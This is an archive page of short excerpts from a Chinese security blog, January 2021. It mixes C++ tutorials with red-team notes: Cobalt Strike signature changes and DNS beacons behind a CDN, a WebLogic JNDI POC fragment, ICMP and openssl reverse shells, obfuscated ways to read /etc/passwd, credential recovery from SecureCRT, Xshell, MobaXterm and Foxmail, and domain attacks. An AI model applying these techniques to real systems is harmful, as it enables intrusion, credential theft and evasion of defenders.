论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

01 2021 档案

摘要:#include<iostream> #include<Windows.h> int main() { HWND testwindow;//声明窗口句柄 testwindow = GetForegroundWindow();//当前窗口句柄 testwindow = FindWindow(NULL, 阅读全文
posted @ 2021-01-31 20:23 Yangsir34 阅读(1536) 评论(0) 推荐(0)

摘要:前言 演练期间终端不知道发生了什么,反正自己查就行了 当时情况时间有限,很多点还可以继续细扣,期间截图并不完整,仅记录部分主要发现,敏感信息已打码 实际分析 登录终端,确认当前网段&ip: 确认cpu无异常: 历史命令已被删除: 终端无异常连接: 启动项发现异常如下: 发现相关目录存在异常,目标文件 阅读全文
posted @ 2021-01-31 20:03 Yangsir34 阅读(217) 评论(0) 推荐(0)

摘要:函数分文件编写 创建.h .cpp的头&源文件 在.h头文件内写函数的声明,在.cpp源文件内写函数的定义 文件结构如下: 案例代码: //add.h #include<iostream> using namespace std; void add(int a, int b); //此处仅声明函数 阅读全文
posted @ 2021-01-31 15:23 Yangsir34 阅读(1284) 评论(0) 推荐(0)

摘要:#include<iostream> #include<string> using namespace std; void sort(int * a, int len) { int i, j, q; for ( i = 0; i < len-1; i++) { for (j = 0; j < len 阅读全文
posted @ 2021-01-31 15:22 Yangsir34 阅读(112) 评论(0) 推荐(0)

摘要:前言 为什么要修改特征? 请自行思考~ 修改默认端口 teamserver文件内进行如下修改: 再次启动,确认端口如下: 修改证书 修改前特征如下: 查看默认证书情况,此处密码默认123456,确认包含cs信息 keytool -list -v -keystore cobaltstrike.stor 阅读全文
posted @ 2021-01-31 14:21 Yangsir34 阅读(262) 评论(0) 推荐(0)

摘要:准备条件 需要条件一个vps,用来部署你的cs;一个域名,至于要不要备案就看你自己的了,备案了的域名为蓝队溯源你提供便利;再来个cdn 实际使用 设定相关解析如下: 创建监听如下: 生成payload目标上线如下: 输入checkin、mode dns-txt 确认流量均走dns协议 阅读全文
posted @ 2021-01-31 14:16 Yangsir34 阅读(302) 评论(0) 推荐(0)

摘要:https://www.dashengpan.com/ https://www.dalipan.com/ https://www.chaonengsou.com/ https://www.kolsou.com/ http://www.yunpangou.com/ http://www.slimego 阅读全文
posted @ 2021-01-26 13:49 Yangsir34 阅读(512) 评论(0) 推荐(0)

摘要:仅供本地代码学习,用于非法目的与本人无关 核心POC POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.hand 阅读全文
posted @ 2021-01-25 21:20 Yangsir34 阅读(639) 评论(0) 推荐(0)

摘要:数组中的每个数据元素都是相同的数据类型,数组是由连续的内存位置组成的 常见的数组定义: 第一种: 数据类型 数组名[数组长度]; //这里我们是要自己进行定义赋值的 #include <iostream> #include<string> using namespace std; int main( 阅读全文
posted @ 2021-01-24 21:54 Yangsir34 阅读(158) 评论(0) 推荐(0)

摘要:编译模式 c++程序中通常包含.cpp .h文件,前者为C++的源文件,里边都是C++的源代码,后者为C++的头文件,当然也是C++的源代码 C++语言支持分别编译,就是说一个程序的素有的内容可以分成不同地方分别放在不同的cpp文件内,cpp文件内的东西都是相对独立的,编译时不需要同其他文件相互交互 阅读全文
posted @ 2021-01-24 21:51 Yangsir34 阅读(677) 评论(0) 推荐(0)

摘要:选择不要运行的cpp文件,邮件进入属性 如上设置即可,再运行就不会出现报错了~ 阅读全文
posted @ 2021-01-24 21:49 Yangsir34 阅读(720) 评论(0) 推荐(0)

摘要:仅备忘录,具体工具实现自行学习 psloggedon.exe:https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon netsess.exe:http://www.joeware.net/freetools/index.h 阅读全文
posted @ 2021-01-20 22:08 Yangsir34 阅读(672) 评论(0) 推荐(0)

摘要:前言 此文为前文域委派攻击学习后的再次思考,因为先前学习时候部分环境有些局限,可能理解不够透彻,此文再次进行反思&总结 https://www.cnblogs.com/Yang34/p/14264356.html 第一个版本的文章原理啥的更加详细些,这回的文章方向不同些,如果错误请大佬指正 简介 委 阅读全文
posted @ 2021-01-17 20:39 Yangsir34 阅读(918) 评论(0) 推荐(0)

摘要:简介 AdminSDHolder是一个特殊的ad容器,具备一些默认安全权限,用于受保护的ad账户和组的模板 active directory将采用AdminSDHolder对象的acl并定期将其应用于所有受保护的ad账户和组,以防止意外和无意的修改并确保对这些对象的访问是安全的 如果能够修改Admi 阅读全文
posted @ 2021-01-15 15:31 Yangsir34 阅读(731) 评论(0) 推荐(0)

摘要:安装 java: java自行下载 neo4j: https://neo4j.com/download-center/#releases 进入neo4j的bin目录 neo4j console启动即可 确认服务运行成功,注意这里初次登陆账户密码都是neo4j,会提醒你修改密码,务必牢记住修改后的密码 阅读全文
posted @ 2021-01-14 16:43 Yangsir34 阅读(233) 评论(0) 推荐(0)

摘要:SPN简介 SPN是服务器上所运行服务的唯一标识,每个使用kerberos的服务都需要一个SPN;一种注册在AD上机器账户下,另一种注册在域用户下,当一个服务权限为localsystem或者networkservice,则SPN注册在机器账户Computers下,当一个机器服务的权限为一个域用户,则 阅读全文
posted @ 2021-01-14 16:37 Yangsir34 阅读(381) 评论(0) 推荐(0)

摘要:简介 已知ntlm分为v1&v2的版本,其中v1的response非常容易能够爆破出用户hash,相比较而言不安全,但ntlmv2的版本使用了hmac_md5函数,通过response很难爆破出真正的用户密码 先前已经知道ntlm reylay主要还是因为服务端与客户端中间多了一个中间人进行攻击,中 阅读全文
posted @ 2021-01-14 14:57 Yangsir34 阅读(815) 评论(0) 推荐(0)

摘要:LMhash&NTLMhash 已知windows密码都不是明文保存的,都是以hash的形式放在了本地sam内,域内的密码hash则保存在了域控的ntds.dit内 导入的密码hash如下: Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:CCE 阅读全文
posted @ 2021-01-14 14:46 Yangsir34 阅读(1378) 评论(0) 推荐(0)

摘要:域委派攻击 简介 域委派是指将域内用户的权限委派给服务账户,使得相关服务账户能够以域用户的权限获得相关域内服务资源权限 主要还是充分发挥windows的权限控制,假设用户A利用自己的身份可以访问到一个网站B,请求网站的资源C,但是网站B上边本身没有资源C,那么网站B就需要用用户A的身份去访问另外一台 阅读全文
posted @ 2021-01-11 21:00 Yangsir34 阅读(6910) 评论(0) 推荐(1)

摘要:有时候总是不确定个人ip地址是多少,代理究竟挂上没,如下命令可以帮到你 curl ipinfo.io curl cip.cc curl myip.ipip.net curl ifconfig.me curl http://members.3322.org/dyndns/getip 阅读全文
posted @ 2021-01-08 21:30 Yangsir34 阅读(216) 评论(0) 推荐(0)

摘要:利用 攻击机下载客户端并编译: git clone https://github.com/jamesbarlow/icmptunnel.git cd icmptunnel/ make ./icmptunnel -s 开启服务 ./icmptunnel -s & 可实现放置到后台 /sbin/ifco 阅读全文
posted @ 2021-01-07 21:56 Yangsir34 阅读(204) 评论(0) 推荐(0)

摘要:利用 当不知道对方公网ip可使用tcpdump对icmp包进行抓取,目标机器ping攻击机ip即可 windows 攻击机: 必须开启禁ping,才可通过icmp反弹shell sysctl -w net.ipv4.icmp_echo_ignore_all=1 git clone https://g 阅读全文
posted @ 2021-01-07 21:54 Yangsir34 阅读(126) 评论(0) 推荐(0)

摘要:简介 在Kerberos认证中的客户端与server中,仅向server证明了客户端就是客户端,但server并不知道客户端到底能够访问哪些资源。 域环境中若要知道某个用户具备哪些权限,需要提供相关sid及组sid,server仅信任KDC提供的用户具备哪些权限,KDC必须告知server关于用户的 阅读全文
posted @ 2021-01-07 21:08 Yangsir34 阅读(553) 评论(2) 推荐(0)

摘要:简介 Kerberos协议通过密钥系统为客户端与服务提供认证服务,为了解决当客户端去访问一个服务器的某服务时,服务器如何判断该对象是否有相关权限来访问自己的服务,同时数据在传输过程中即便被篡改也不会影响整个通讯的安全 概念 DC(Domain Controller)域控 KDC(Key Distri 阅读全文
posted @ 2021-01-07 21:03 Yangsir34 阅读(3091) 评论(0) 推荐(0)

摘要:加密Tcp反向 攻击机: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -po 阅读全文
posted @ 2021-01-06 17:26 Yangsir34 阅读(109) 评论(0) 推荐(0)

摘要:#ifndef UNICODE #define UNICODE #endif #pragma comment(lib, "netapi32.lib") #include <stdio.h> #include <assert.h> #include <windows.h> #include <lm.h 阅读全文
posted @ 2021-01-06 16:50 Yangsir34 阅读(344) 评论(0) 推荐(0)

摘要:域外windows 一句话域内搜集 PingCastle.exe --server 192.168.3.142 --user 0day.org\jack --password admin!@#45 --protocol ADWSThenLDAP --healthcheck --explore-tru 阅读全文
posted @ 2021-01-06 13:56 Yangsir34 阅读(808) 评论(0) 推荐(0)

摘要:简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite 中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。PsExec 可以算是一个轻量级的 telnet 替代工具,它使您无需手动安装客户端软件即 阅读全文
posted @ 2021-01-06 11:12 Yangsir34 阅读(573) 评论(0) 推荐(0)

摘要:cat /etc/passwd cat /e"t"c/pa"s"swd cat /'e'tc/pass'wd' cat /etc/pa??wd cat /etc/p*wd cat /et''c/pass''wd cat /et${test}c/pa${hah}sswd IFS=,;`cat<<<ca 阅读全文
posted @ 2021-01-05 22:44 Yangsir34 阅读(342) 评论(0) 推荐(0)

摘要:pip3 install XXX -i http://pypi.douban.com/simple --trusted-host pypi.douban.com pip3 install pycrypto -i http://pypi.douban.com/simple --trusted-host 阅读全文
posted @ 2021-01-05 22:35 Yangsir34 阅读(86) 评论(0) 推荐(0)

摘要:基础结构 #include <iostream> //包含iostream名字的头文件 作为一种包含功能函数、数据接口声明的载体文件,通常编译器通过头文件找到对应的函数库,把引用的函数实际内容导出来 //<> 代表标准库的头文件 ""代表引用非标准款的头文件 //这里的iostream 是C++d的 阅读全文
posted @ 2021-01-05 22:27 Yangsir34 阅读(107) 评论(0) 推荐(0)

摘要:远程连接服务时出现如下报错,主要因为交换ssh密钥时候算法不匹配,这里需要自行解决ssh相关问题,此处不再深入赘述 实际使用 找到目标securecrt保存在本地的所有连接会话文件,默认都存放在当前用户数据目录下的Config目录下的Sessions目录中,以.ini命名 %APPDATA%\Van 阅读全文
posted @ 2021-01-05 17:38 Yangsir34 阅读(4057) 评论(0) 推荐(1)

摘要:apt-get -y install openbsd-inetd apt-get -y install telnetd vim /etc/inetd.conf #: STANDARD: These are standard services. telnet stream tcp nowait tel 阅读全文
posted @ 2021-01-05 17:03 Yangsir34 阅读(286) 评论(0) 推荐(0)

摘要:加密方式: https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md 账户密码保存位置: XShell5 %userpro 阅读全文
posted @ 2021-01-05 15:49 Yangsir34 阅读(9967) 评论(0) 推荐(2)

摘要:工具链接 https://github.com/HyperSine/how-does-MobaXterm-encrypt-password 不带管理密码 无管理密码的解密,直接读注册表,从注册表读连接信息和账户hash reg query HKEY_CURRENT_USER\Software\Mob 阅读全文
posted @ 2021-01-05 15:46 Yangsir34 阅读(12072) 评论(0) 推荐(0)

摘要:第一种 https://github.com/StarZHF/Foxmail-Password-Recovery/tree/master/foxDecode 自行编译后直接丢工具解密即可 第二种 找到foxmail的安装目录: E:\Program Files\Foxmail 7.2\Storage 阅读全文
posted @ 2021-01-05 15:41 Yangsir34 阅读(4296) 评论(0) 推荐(2)

摘要:windows命令绕过 forfies 使用方式如下: 实际使用: forfiles /c c:\windows\system32\calc.exe 确认任务的父进程为forfiles.exe pcalua 实际使用: pcalua.exe -a c:\windows\system32\calc.e 阅读全文
posted @ 2021-01-04 17:09 Yangsir34 阅读(856) 评论(0) 推荐(0)